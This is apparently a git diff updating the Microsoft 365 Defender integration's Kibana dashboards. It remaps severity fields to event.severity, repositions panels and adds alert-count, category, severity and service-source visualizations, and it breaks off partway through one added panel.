a/packages/m365_defender/img/m365-defender-alert.png b/packages/m365_defender/img/m365-defender-alert.png new file mode 100644 index 00000000000..308c6b77446 Binary files /dev/null and b/packages/m365_defender/img/m365-defender-alert.png differ diff --git a/packages/m365_defender/img/m365-defender-incident-alert1.png b/packages/m365_defender/img/m365-defender-incident-alert1.png deleted file mode 100644 index ffde9911c29..00000000000 Binary files a/packages/m365_defender/img/m365-defender-incident-alert1.png and /dev/null differ diff --git a/packages/m365_defender/img/m365-defender-incident-alert2.png b/packages/m365_defender/img/m365-defender-incident-alert2.png deleted file mode 100644 index 27ab38cc080..00000000000 Binary files a/packages/m365_defender/img/m365-defender-incident-alert2.png and /dev/null differ diff --git a/packages/m365_defender/img/m365-defender-incidents-incidents1.png b/packages/m365_defender/img/m365-defender-incidents-incidents1.png deleted file mode 100644 index 66b45cc077e..00000000000 Binary files a/packages/m365_defender/img/m365-defender-incidents-incidents1.png and /dev/null differ diff --git a/packages/m365_defender/img/m365-defender-incidents-incidents2.png b/packages/m365_defender/img/m365-defender-incidents-incidents2.png deleted file mode 100644 index 322d1f5a866..00000000000 Binary files a/packages/m365_defender/img/m365-defender-incidents-incidents2.png and /dev/null differ diff --git a/packages/m365_defender/img/m365-defender-incidents.png b/packages/m365_defender/img/m365-defender-incidents.png new file mode 100644 index 00000000000..2ba96e46803 Binary files /dev/null and b/packages/m365_defender/img/m365-defender-incidents.png differ diff --git a/packages/m365_defender/kibana/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c.json b/packages/m365_defender/kibana/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c.json index 6c97e5cd576..c9b0c72246e 100644 --- a/packages/m365_defender/kibana/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c.json +++ b/packages/m365_defender/kibana/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c.json @@ -4,7 +4,7 @@ "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"d218fe98-720c-4475-b679-38ebec3e5ecb\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d218fe98-720c-4475-b679-38ebec3e5ecb\",\"fieldName\":\"m365_defender.event.severity\",\"title\":\"Severity\",\"enhancements\":{}}},\"f8f04068-22e1-41e8-b1a1-0786df2a0d10\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"f8f04068-22e1-41e8-b1a1-0786df2a0d10\",\"fieldName\":\"host.name\",\"title\":\"Hostname\",\"enhancements\":{}}},\"0a666826-2535-479f-bfc7-55f386ebc9fc\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"0a666826-2535-479f-bfc7-55f386ebc9fc\",\"fieldName\":\"user.name\",\"title\":\"Username\",\"enhancements\":{}}},\"0c0c21f4-2b5b-4945-bde3-de61ee7c1c22\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"0c0c21f4-2b5b-4945-bde3-de61ee7c1c22\",\"fieldName\":\"m365_defender.event.alert.category\",\"title\":\"Alert Category\",\"enhancements\":{}}}}" + "panelsJSON": "{\"d218fe98-720c-4475-b679-38ebec3e5ecb\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d218fe98-720c-4475-b679-38ebec3e5ecb\",\"fieldName\":\"event.severity\",\"title\":\"Severity\",\"enhancements\":{}}},\"f8f04068-22e1-41e8-b1a1-0786df2a0d10\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"f8f04068-22e1-41e8-b1a1-0786df2a0d10\",\"fieldName\":\"host.name\",\"title\":\"Hostname\",\"enhancements\":{}}},\"0a666826-2535-479f-bfc7-55f386ebc9fc\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"0a666826-2535-479f-bfc7-55f386ebc9fc\",\"fieldName\":\"user.name\",\"title\":\"Username\",\"enhancements\":{}}},\"0c0c21f4-2b5b-4945-bde3-de61ee7c1c22\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"0c0c21f4-2b5b-4945-bde3-de61ee7c1c22\",\"fieldName\":\"m365_defender.event.alert.category\",\"title\":\"Alert Category\",\"enhancements\":{}}}}" }, "description": "Overview of Microsoft 365 Defender Alert Events.", "kibanaSavedObjectMeta": { @@ -193,9 +193,9 @@ "meta": { "alias": null, "disabled": false, - "field": "m365_defender.event.severity", + "field": "event.severity", "index": "logs-*", - "key": "m365_defender.event.severity", + "key": "event.severity", "negate": false, "params": { "query": "high" @@ -204,7 +204,7 @@ }, "query": { "match_phrase": { - "m365_defender.event.severity": "high" + "event.severity": "high" } } } @@ -410,9 +410,9 @@ "meta": { "alias": null, "disabled": false, - "field": "m365_defender.event.severity", + "field": "event.severity", "index": "logs-*", - "key": "m365_defender.event.severity", + "key": "event.severity", "negate": false, "params": { "query": "medium" @@ -421,7 +421,7 @@ }, "query": { "match_phrase": { - "m365_defender.event.severity": "medium" + "event.severity": "medium" } } } @@ -627,9 +627,9 @@ "meta": { "alias": null, "disabled": false, - "field": "m365_defender.event.severity", + "field": "event.severity", "index": "logs-*", - "key": "m365_defender.event.severity", + "key": "event.severity", "negate": false, "params": { "query": "low" @@ -638,7 +638,7 @@ }, "query": { "match_phrase": { - "m365_defender.event.severity": "low" + "event.severity": "low" } } } @@ -844,9 +844,9 @@ "meta": { "alias": null, "disabled": false, - "field": "m365_defender.event.severity", + "field": "event.severity", "index": "logs-*", - "key": "m365_defender.event.severity", + "key": "event.severity", "negate": false, "params": { "query": "informational" @@ -855,7 +855,7 @@ }, "query": { "match_phrase": { - "m365_defender.event.severity": "informational" + "event.severity": "informational" } } } @@ -1114,7 +1114,7 @@ "size": 5 }, "scale": "ordinal", - "sourceField": "m365_defender.event.severity" + "sourceField": "event.severity" }, "5772c4ea-7b5d-462a-badf-898f36d749e7": { "customLabel": true, diff --git a/packages/m365_defender/kibana/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06.json b/packages/m365_defender/kibana/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06.json index 8677d09a45f..f9a2c14a6f8 100644 --- a/packages/m365_defender/kibana/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06.json +++ b/packages/m365_defender/kibana/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06.json @@ -4,7 +4,7 @@ "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"72c489e6-c07a-4c74-8c35-d70b4b4e8ccd\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"72c489e6-c07a-4c74-8c35-d70b4b4e8ccd\",\"fieldName\":\"m365_defender.incident.severity\",\"title\":\"Severity\",\"enhancements\":{}}},\"4f83317b-ba18-4a9a-b682-b822f79ee030\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"4f83317b-ba18-4a9a-b682-b822f79ee030\",\"fieldName\":\"m365_defender.incident.status\",\"title\":\"Incident Status\",\"enhancements\":{}}},\"7aef0b74-b368-4a23-a713-02f3fcc672fc\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7aef0b74-b368-4a23-a713-02f3fcc672fc\",\"fieldName\":\"source.user.name\",\"title\":\"Source Username\",\"enhancements\":{}}},\"d4d6a591-6a26-412e-b0bd-9f71329143ba\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d4d6a591-6a26-412e-b0bd-9f71329143ba\",\"fieldName\":\"host.name\",\"title\":\"Hostname\",\"enhancements\":{}}}}" + "panelsJSON": "{\"72c489e6-c07a-4c74-8c35-d70b4b4e8ccd\":{\"type\":\"rangeSliderControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"fieldName\":\"event.severity\",\"value\":[\"\",\"\"],\"id\":\"72c489e6-c07a-4c74-8c35-d70b4b4e8ccd\",\"enhancements\":{}}},\"4f83317b-ba18-4a9a-b682-b822f79ee030\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"4f83317b-ba18-4a9a-b682-b822f79ee030\",\"fieldName\":\"m365_defender.incident.status\",\"title\":\"Incident Status\",\"enhancements\":{}}},\"7aef0b74-b368-4a23-a713-02f3fcc672fc\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7aef0b74-b368-4a23-a713-02f3fcc672fc\",\"fieldName\":\"source.user.name\",\"title\":\"Source Username\",\"enhancements\":{}}},\"d4d6a591-6a26-412e-b0bd-9f71329143ba\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d4d6a591-6a26-412e-b0bd-9f71329143ba\",\"fieldName\":\"host.name\",\"title\":\"Hostname\",\"enhancements\":{}}}}" }, "description": "Overview of Microsoft 365 Defender Incidents", "kibanaSavedObjectMeta": { @@ -43,7 +43,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "### Navigation\n\n#### M365 Defender\n\n#### EventHub Datastream \n[Alert Events](#/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c) \n[Device Events](#/dashboard/m365_defender-c0b796d0-720a-11ed-8657-c59f6ece834c) \n[App \u0026 Identity Events](#/dashboard/m365_defender-d587df00-745f-11ed-8657-c59f6ece834c) \n[Email Events](#/dashboard/m365_defender-3caf3c00-7456-11ed-8657-c59f6ece834c) \n\n#### Incident Datastream (Graph API) \n\n**[Incidents](#/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06)** \n[Alerts](#/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03) \n\n#### Description\n\nThis dashboard visualizes Incident type events collected from the MS Graph API using the Incident Datastream\n\n", + "markdown": "### Navigation\n\n#### M365 Defender\n\n#### EventHub Datastream \n[Alert Events](#/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c) \n[Device Events](#/dashboard/m365_defender-c0b796d0-720a-11ed-8657-c59f6ece834c) \n[App \u0026 Identity Events](#/dashboard/m365_defender-d587df00-745f-11ed-8657-c59f6ece834c) \n[Email Events](#/dashboard/m365_defender-3caf3c00-7456-11ed-8657-c59f6ece834c) \n\n#### Graph API Datastream\n**[Incidents](#/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06)** \n[Alerts](#/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03) \n\n#### Description\n\nThis dashboard visualizes Incident and Alert type events collected from the MS Graph API using the Incident Datastream\n\n", "openLinksInNewTab": false }, "title": "", @@ -249,6 +249,205 @@ "type": "lens", "version": "8.7.1" }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6ddc53cd-2bbd-4616-837b-3fbe0712ca7e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6ddc53cd-2bbd-4616-837b-3fbe0712ca7e": { + "columnOrder": [ + "330da6b3-a0e3-41b9-8103-69b3381f1788", + "6400adfe-4702-4f13-923f-f94d87aa0ced", + "6400adfe-4702-4f13-923f-f94d87aa0cedX0", + "6400adfe-4702-4f13-923f-f94d87aa0cedX1" + ], + "columns": { + "330da6b3-a0e3-41b9-8103-69b3381f1788": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Total Alerts" + }, + { + "input": { + "language": "kuery", + "query": "m365_defender.incident.alert.status : \"new\" " + }, + "label": "New Alerts" + }, + { + "input": { + "language": "kuery", + "query": "m365_defender.incident.alert.status : \"inProgress\" " + }, + "label": "In Progress Alerts" + }, + { + "input": { + "language": "kuery", + "query": "m365_defender.incident.alert.status : \"resolved\" " + }, + "label": "Resolved Alerts" + }, + { + "input": { + "language": "kuery", + "query": "m365_defender.incident.alert.severity : \"high\"" + }, + "label": "High Severity Alerts" + }, + { + "input": { + "language": "kuery", + "query": "not (m365_defender.incident.alert.assigned_to : * )" + }, + "label": "Unassigned Alerts" + } + ] + }, + "scale": "ordinal" + }, + "6400adfe-4702-4f13-923f-f94d87aa0ced": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "formula", + "params": { + "formula": "defaults(unique_count(m365_defender.incident.alert.id), 0)", + "isFormulaBroken": false + }, + "references": [ + "6400adfe-4702-4f13-923f-f94d87aa0cedX1" + ], + "scale": "ratio" + }, + "6400adfe-4702-4f13-923f-f94d87aa0cedX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Count", + "operationType": "unique_count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "6400adfe-4702-4f13-923f-f94d87aa0cedX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Count", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "6400adfe-4702-4f13-923f-f94d87aa0cedX0", + 0 + ], + "location": { + "max": 58, + "min": 0 + }, + "name": "defaults", + "text": "defaults(unique_count(m365_defender.incident.alert.id), 0)", + "type": "function" + } + }, + "references": [ + "6400adfe-4702-4f13-923f-f94d87aa0cedX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "330da6b3-a0e3-41b9-8103-69b3381f1788", + "color": "#6092C0", + "layerId": "6ddc53cd-2bbd-4616-837b-3fbe0712ca7e", + "layerType": "data", + "metricAccessor": "6400adfe-4702-4f13-923f-f94d87aa0ced" + } + }, + "title": "Alert Counts [Logs Microsoft 365 Defender] (converted)", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "4b49a572-a243-4c87-bea9-d0531d9dbd5a", + "w": 40, + "x": 8, + "y": 8 + }, + "panelIndex": "4b49a572-a243-4c87-bea9-d0531d9dbd5a", + "title": "Alert Counts [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, { "embeddableConfig": { "attributes": { @@ -260,7 +459,7 @@ }, { "id": "logs-*", - "name": "ce3e96ee-3a9d-477a-ac37-db9a950d836d", + "name": "c2e6011b-e248-4de4-8701-18029063d0ce", "type": "index-pattern" } ], @@ -277,7 +476,7 @@ "columns": { "330afb86-6197-4204-b9d3-49fb9d878111": { "customLabel": true, - "dataType": "string", + "dataType": "number", "isBucketed": true, "label": "Severity", "operationType": "terms", @@ -289,10 +488,14 @@ }, "orderDirection": "desc", "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 5 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.severity" + "sourceField": "event.severity" }, "8e73def1-b551-4bc3-9676-6bfe825f308f": { "customLabel": true, @@ -318,7 +521,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "ce3e96ee-3a9d-477a-ac37-db9a950d836d", + "index": "c2e6011b-e248-4de4-8701-18029063d0ce", "key": "data_stream.dataset", "negate": false, "params": { @@ -371,7 +574,7 @@ "i": "09a42be0-f530-4662-a284-5ad7d3264935", "w": 16, "x": 8, - "y": 8 + "y": 22 }, "panelIndex": "09a42be0-f530-4662-a284-5ad7d3264935", "title": "Distribution of Incidents by Severity [Logs Microsoft 365 Defender]", @@ -389,7 +592,7 @@ }, { "id": "logs-*", - "name": "b5cb2c9c-2731-4f8b-8001-4c674d131b67", + "name": "20ea0ba5-f3a2-45a8-8af1-00ccb757801f", "type": "index-pattern" } ], @@ -420,7 +623,7 @@ }, "d7cb197f-5b47-4ac1-a0c4-587c7b267a98": { "customLabel": true, - "dataType": "string", + "dataType": "number", "isBucketed": true, "label": "Severity", "operationType": "terms", @@ -432,10 +635,14 @@ }, "orderDirection": "desc", "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 6 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.severity" + "sourceField": "event.severity" }, "df079051-f9c4-455e-9b45-991460a206a2": { "customLabel": true, @@ -461,7 +668,7 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "b5cb2c9c-2731-4f8b-8001-4c674d131b67", + "index": "20ea0ba5-f3a2-45a8-8af1-00ccb757801f", "key": "data_stream.dataset", "negate": false, "params": { @@ -524,7 +731,7 @@ "i": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b", "w": 24, "x": 24, - "y": 8 + "y": 22 }, "panelIndex": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b", "title": "Severity Over Time [Logs Microsoft 365 Defender]", @@ -656,7 +863,7 @@ "i": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53", "w": 40, "x": 8, - "y": 27 + "y": 41 }, "panelIndex": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53", "title": "Count of Incidents Over Time [Logs Microsoft 365 Defender]", @@ -803,7 +1010,7 @@ "i": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789", "w": 40, "x": 8, - "y": 43 + "y": 57 }, "panelIndex": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789", "title": "Incident with Highest Count of Alerts [Logs Microsoft 365 Defender]", @@ -815,87 +1022,2029 @@ "enhancements": {} }, "gridData": { - "h": 32, + "h": 17, "i": "b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", "w": 40, "x": 8, - "y": 59 + "y": 73 }, "panelIndex": "b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", "panelRefName": "panel_b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", "type": "search", "version": "8.7.1" - } - ], - "timeRestore": false, - "title": "[Logs Microsoft 365 Defender] Incident", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-04T08:56:36.875Z", - "id": "m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06", - "migrationVersion": { - "dashboard": "8.7.0" - }, - "references": [ - { - "id": "logs-*", - "name": "0bc0ee87-64be-46bf-89ac-3a3c17f3ab7e:indexpattern-datasource-layer-961a470c-6271-4d2f-b553-646b67834136", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "0bc0ee87-64be-46bf-89ac-3a3c17f3ab7e:22e1bd27-885c-4745-b12d-9381e438538f", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "09a42be0-f530-4662-a284-5ad7d3264935:indexpattern-datasource-layer-19999c0c-be9d-43ba-994a-72fadb61fabc", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "09a42be0-f530-4662-a284-5ad7d3264935:ce3e96ee-3a9d-477a-ac37-db9a950d836d", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b:indexpattern-datasource-layer-f41e1d1a-0dc1-4416-b48b-a04c4e59d46c", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b:b5cb2c9c-2731-4f8b-8001-4c674d131b67", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53:indexpattern-datasource-layer-a3705125-6c5c-43a6-a594-6d384c293ec9", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53:a77281bd-3237-4d8d-b908-18a4a562b070", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789:indexpattern-datasource-layer-7f55a9ab-9515-4d17-844d-c925b2ccdbd1", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789:644633f8-cafb-4bfd-8a03-4a1e7c1146e7", - "type": "index-pattern" - }, - { - "id": "m365_defender-fcf25960-44af-11ed-8375-0168a9970c06", - "name": "b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0:panel_b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2fa8c035-1708-4d32-88fc-b59af7751db4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2fa8c035-1708-4d32-88fc-b59af7751db4": { + "columnOrder": [ + "ccf17a24-dc07-4800-983f-8c507665a6a0", + "87199ce0-75a4-414f-860f-7c25177fb5b3" + ], + "columns": { + "87199ce0-75a4-414f-860f-7c25177fb5b3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "ccf17a24-dc07-4800-983f-8c507665a6a0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Attack Kill-Chain Category", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "87199ce0-75a4-414f-860f-7c25177fb5b3", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.tactic.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "87199ce0-75a4-414f-860f-7c25177fb5b3" + ], + "layerId": "2fa8c035-1708-4d32-88fc-b59af7751db4", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "ccf17a24-dc07-4800-983f-8c507665a6a0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a567157d-8f3c-4fa5-b7a1-1caa3f9252b2", + "w": 24, + "x": 0, + "y": 90 + }, + "panelIndex": "a567157d-8f3c-4fa5-b7a1-1caa3f9252b2", + "title": "Distribution of Alerts by Category [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-874da7c4-ebe5-4c5c-a302-094d287b81bb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2128586b-14fe-4907-84a9-4c193f8a2c5f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "874da7c4-ebe5-4c5c-a302-094d287b81bb": { + "columnOrder": [ + "91075489-5815-4881-af42-d6e31205b1c5", + "2d7b439a-58f9-400c-b89a-c5ef01f6d82b" + ], + "columns": { + "2d7b439a-58f9-400c-b89a-c5ef01f6d82b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + }, + "91075489-5815-4881-af42-d6e31205b1c5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Severity", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2d7b439a-58f9-400c-b89a-c5ef01f6d82b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "m365_defender.incident.alert.severity" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "2128586b-14fe-4907-84a9-4c193f8a2c5f", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "874da7c4-ebe5-4c5c-a302-094d287b81bb", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "2d7b439a-58f9-400c-b89a-c5ef01f6d82b" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "91075489-5815-4881-af42-d6e31205b1c5" + ] + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "039e6ffc-d9bb-4bfb-9fde-a7dc9a7938bc", + "w": 24, + "x": 24, + "y": 90 + }, + "panelIndex": "039e6ffc-d9bb-4bfb-9fde-a7dc9a7938bc", + "title": "Distribution of Alerts by Severity [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-bdba4af5-1396-46ec-ad04-59157e7697f9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bdba4af5-1396-46ec-ad04-59157e7697f9": { + "columnOrder": [ + "a643f53b-fe39-4a6d-8916-e6eee4a3d30b", + "cd1300db-e9d8-41c8-9407-0159ec6e9410" + ], + "columns": { + "a643f53b-fe39-4a6d-8916-e6eee4a3d30b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Service Source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "cd1300db-e9d8-41c8-9407-0159ec6e9410", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.provider" + }, + "cd1300db-e9d8-41c8-9407-0159ec6e9410": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "cd1300db-e9d8-41c8-9407-0159ec6e9410" + ], + "layerId": "bdba4af5-1396-46ec-ad04-59157e7697f9", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "a643f53b-fe39-4a6d-8916-e6eee4a3d30b" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "7f825e05-faee-4ad4-9898-69cb1204cf89", + "w": 24, + "x": 0, + "y": 105 + }, + "panelIndex": "7f825e05-faee-4ad4-9898-69cb1204cf89", + "title": "Distribution of Alerts by Service Source [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { 